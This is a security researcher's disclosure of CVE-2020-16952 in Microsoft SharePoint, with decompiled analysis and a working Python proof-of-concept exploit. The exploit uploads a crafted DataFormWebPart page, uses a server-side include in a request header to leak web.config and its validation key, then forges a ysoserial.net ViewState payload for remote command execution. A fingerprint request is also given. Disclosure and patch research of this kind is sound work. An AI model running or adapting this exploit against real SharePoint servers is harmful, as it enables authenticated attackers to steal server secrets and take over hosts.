Microsoft SharePoint Server DataFormWebPart CreateChildControls Server-Side Include Remote Code Execution Vulnerability
Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952
## Summary:
An authenticated attacker can craft pages to trigger a server-side include that can be leveraged to leak the web.config file. The attacker can leverage this to achieve remote code execution.
## Notes:
- this does not require the use of a SharePoint endpoint such as WebPartPagesWebService
- the attacker needs AddAndCustomizePages permission enabled which is the default
- you will need to compile and store ysoserial.net in the same folder as this exploit
## Vulnerability Analysis:
Inside of the Microsoft.SharePoint.WebPartPages.DataFormWebPart we can observe the `CreateChildControls`
namespace Microsoft.SharePoint.WebPartPages
// Token: 0x02002CC1 RID: 11457
[XmlRoot(Namespace = "http://schemas.microsoft.com/WebPart/v2/DataView")]
[AspNetHostingPermission(SecurityAction.LinkDemand, Level = AspNetHostingPermissionLevel.Minimal)]
[SharePointPermission(SecurityAction.LinkDemand, ObjectModel = true)]
[AspNetHostingPermission(SecurityAction.InheritanceDemand, Level = AspNetHostingPermissionLevel.Minimal)]
[SharePointPermission(SecurityAction.InheritanceDemand, ObjectModel = true)]
public class DataFormWebPart : BaseXsltDataWebPart, IDesignTimeHtmlProvider, IPostBackEventHandler, IWebPartRow, ICallbackEventHandler, IConnectionData, IListWebPart
// ...
[SharePointPermission(SecurityAction.Demand, ObjectModel = true)]
protected override void CreateChildControls()
if (!this.Visible)
if (!this.AreAllConsumerInterfacesFulfilled())
this._deferredXSLTBecauseOfConnections = true;
if ((base.DesignMode && this.AllowXSLTEditing) || this._forAJAXDropDown)
if (this.IsMondoCAMLWebPart() && !base.DesignMode && !string.IsNullOrEmpty(this.ListName) && !this.IsForm)
SPContext context = SPContext.GetContext(this.Context, base.StorageKey, new Guid(this.ListName), this.CurrentWeb);
if (context != null)
SPViewContext viewContext = context.ViewContext;
if (this is BaseXsltListWebPart)
BaseXsltListWebPart baseXsltListWebPart = this as BaseXsltListWebPart;
if (baseXsltListWebPart.view != null)
viewContext.View = baseXsltListWebPart.view;
if (viewContext != null && base.RenderMode != RenderMode.Design && base.RenderMode != RenderMode.Preview)
UpdatePanel updatePanel = null;
if (this.AsyncRefresh)
this.CreateAsyncPostBackControls(ref updatePanel);
if (base.DesignMode || !this.InitialAsyncDataFetch || this.Page == null || this.Page.IsCallback)
this.EnsureDataBound(); // 1
this._asyncDelayed = true;
if (this.SPList != null && this.SPList.HasExternalDataSource)
this.deferXsltTransform = false;
string text = Utility.MakeLayoutsRootServerRelative("images/gears_an.gif");
string @string = WebPartPageResource.GetString("DataFormWebPartRefreshing");
this._partContent = this._partContent + "<div id=\"" + this.dfwpWPDiv + "\" style=\"padding-top:5px;\">";
string partContent = this._partContent;
this._partContent = string.Concat(new string[]
"<center><img src='",
"' alt='",
"' style='border-width:0px;' /></center>"
this._partContent += "</div>";
this.EditMode = false;
if (this._partContent != null)
if (this.IsForm && this.DataSource is SPDataSource && base.PageComponent != null && this.ItemContext != null)
this.ItemContext.CurrentPageComponent = base.PageComponent;
bool flag = this.view != null && base.PageComponent != null;
if ((this.IsGhosted || flag) && !this.UseSchemaXmlToolbar && this.ToolbarControl != null)
if (base.PageComponent != null)
this.ToolbarControl.RenderContext.CurrentPageComponent = base.PageComponent;
if ((this.view == null || !this.view.IsGroupRender) && (!this._asyncDelayed || flag))
if (this.AsyncRefresh && updatePanel != null)
this.CanHaveServerControls = true;
if (this.CanHaveServerControls && DataFormWebPart.RunatChecker.IsMatch(this._partContent)) // 2
if (this._assemblyReferences != null && this._partContent != null)
StringBuilder stringBuilder = new StringBuilder();
for (int i = 0; i < this._assemblyReferences.Length; i++)
this._partContent = stringBuilder.ToString();
if (base.Web != null)
EditingPageParser.VerifyControlOnSafeList(this._partContent, null, base.Web, false); // 3
if (this.Page.AppRelativeVirtualPath == null)
this.Page.AppRelativeVirtualPath = "~/current.aspx";
bool flag2 = EditingPageParser.VerifySPDControlMarkup(this._partContent);
if (flag2)
ULS.SendTraceTag(595161362U, ULSCat.msoulscat_WSS_WebParts, ULSTraceLevel.Medium, "Allow DFWP XSL markup {0} to be parsed without parserFilter.", new object[]
Control control = this.Page.ParseControl(this._partContent, flag2); // 4
SPDataSource spdataSource = this.DataSource as SPDataSource;
bool flag3 = false;
if (this.view != null && !string.IsNullOrEmpty(this.view.InlineEdit))
flag3 = this.view.InlineEdit.Equals("true", StringComparison.OrdinalIgnoreCase);
SPContext spcontext = null;
if (spdataSource != null && base.Web != null && (spdataSource.DataSourceMode == SPDataSourceMode.ListItem || (spdataSource.DataSourceMode == SPDataSourceMode.List && flag3)))
string text3;
if (spdataSource.DataSourceMode == SPDataSourceMode.List)
string text2 = (string)this.ParameterValues.Collection["dvt_form_key"];
text3 = text2;
text3 = spdataSource.ListItemID.ToString(CultureInfo.InvariantCulture);
if (text3 != null)
if (this.FormContexts.ContainsKey(text3))
spcontext = this.FormContexts[text3];
spcontext = SPContext.GetContext(this.Context, text3, ((IListWebPart)this).ListId, this.CurrentWeb);
this.FormContexts[text3] = spcontext;
foreach (object obj in control.Controls)
Control control2 = (Control)obj;
this.RecursivelyAddFormFieldContext(control2, spcontext);
if (spcontext != null && spdataSource != null)
spdataSource.ItemContext = spcontext;
if (this.AsyncRefresh && updatePanel != null)
updatePanel.ContentTemplateContainer.Controls.Add(control); // 5
using (IEnumerator enumerator2 = control.Controls.GetEnumerator())
while (enumerator2.MoveNext())
object obj2 = enumerator2.Current;
Control control3 = (Control)obj2;
goto IL_632;
if (this.AsyncRefresh && updatePanel != null)
if (this._listView != null)
Literal literal = new Literal();
literal.Text = this._partContent;
else if (this._listView != null)
this.AddParsedSubObject(new Literal
Text = this._partContent
this._partContent = null;
this._listView = null;
this._asyncDelayed = false;
At *[1]*, the code performs a databind and accesses the data from the datasource (in this case it's our controlled serverside http header). The data returned must be valid xml so that it can be processed via our crafted xslt. Then at *[2]* the code calls `DataFormWebPart.RunatChecker.IsMatch` on our controlled `_partContent`. This checks for an instance of `runat=server` in the supplied xml. However, we can't put that in there because we can't register any prefixes (registration is probably not possible due to the <% not being a valid xml tag). But I found a way to pass the check by using HTML server controls which can include a `runat=server`.
At *[3]* the code calls `VerifyControlOnSafeList` with the false flag, meaning our input can use server-side includes. Lucky for us, includes are valid xml, so we can stuff them into our `_partContent` and later at *[4]* they are parsed and finally added to the page at *[5]*.
This allows an us to leak the complete `web.config` file, including the Validation Key which is enough to generate a malicious serialized viewState and trigger rce via deserialization.
## Fingerprint:
For detecting vulnerable versions before exploitation, you can use this:
PUT /poc.aspx HTTP/1.1
Host: [target]
Content-Length: 67
<asp:Literal runat="server" Text="<%$SPTokens:{ProductNumber}%>" />
Then https://[target]/poc.aspx should return 16.0.10364.20001.
## Credit:
Steven Seeley (mr_me) of Qihoo 360 Vulcan Team
## Example:
For testing, download ysoserial.net and store it in a folder called `yss`.
researcher@DESKTOP-H4JDQCB:~$ ./poc.py
(+) usage: ./poc.py <SPSite> <user:pass> <cmd>
(+) eg: ./poc.py win-3t816hj84n4 harryh@pwn.me:user123### mspaint
(+) eg: ./poc.py win-3t816hj84n4/sites/test harryh@pwn.me:user123### notepad
researcher@DESKTOP-H4JDQCB:~$ ./poc.py win-3t816hj84n4 harryh@pwn.me:user123### notepad
(+) leaked validation key: 55AAE0A8E646746523FA5EE0675232BE39990CDAC3AE2B0772E32D71C05929D8
(+) triggering rce, running 'cmd /c notepad'
(+) done! rce achieved
import os
import re
import sys
import urllib3
import requests
import subprocess
from platform import uname
from requests_ntlm2 import HttpNtlmAuth
from urllib.parse import urlparse
def put_page(target, domain, user, password):
payload = """<WebPartPages:DataFormWebPart runat="server">
<ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />
<xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:param name="ssi" />
<xsl:template match="/">
<xsl:value-of select="$ssi" disable-output-escaping="yes" />
r = requests.put("http://%s/poc.aspx" % target, data=payload, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password))
assert (r.status_code == 200 or r.status_code == 201), "(-) page creation failed, user doesn't have site ownership rights!"
def get_vkey(target, domain, user, password):
h = { "360Vulcan": "<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->" }
r = requests.get("http://%s/poc.aspx" % target, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password), headers=h)
match = re.search("machineKey validationKey=\"(.{64})", r.text)
assert match, "(-) unable to leak the validation key, exploit failed!"
return match.group(1)
def trigger_rce(target, domain, path, user, password, cmd, key):
out = subprocess.Popen([
'-p', 'ViewState',
'-g', 'TypeConfuseDelegate',
'-c', '%s' % cmd,
'--apppath=%s' % path,
'--path=%s_layouts/15/zoombldr.aspx' % path,
'--validationkey=%s' % key
], stdout=subprocess.PIPE)
rce = { "__VIEWSTATE" : out.communicate()[0].decode() }
requests.post("http://%s/_layouts/15/zoombldr.aspx" % target, data=rce, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password))
def main():
if len(sys.argv) != 4:
print("(+) usage: %s <SPSite> <user:pass> <cmd>" % sys.argv[0])
print("(+) eg: %s win-3t816hj84n4 harryh@pwn.me:user123### mspaint" % sys.argv[0])
print("(+) eg: %s win-3t816hj84n4/sites/test harryh@pwn.me:user123### notepad" % sys.argv[0])
target = sys.argv[1]
user = sys.argv[2].split(":")[0].split("@")[0]
password = sys.argv[2].split(":")[1]
domain = sys.argv[2].split(":")[0].split("@")[1]
cmd = sys.argv[3]
path = urlparse("http://%s" % target).path or "/"
path = path + "/" if not path.endswith("/") else path
put_page(target, domain, user, password)
key = get_vkey(target, domain, user, password)
print("(+) leaked validation key: %s" % key)
print("(+) triggering rce, running 'cmd /c %s'" % cmd)
trigger_rce(target, domain, path, user, password, cmd, key)
print("(+) done! rce achieved")
if __name__ == '__main__':
if "microsoft" not in uname()[2].lower():
print("(-) WARNING - this was tested on wsl, so it may not work on other platforms")
if not os.path.exists('yss/ysoserial.exe'):
print("(-) missing ysoserial.net!")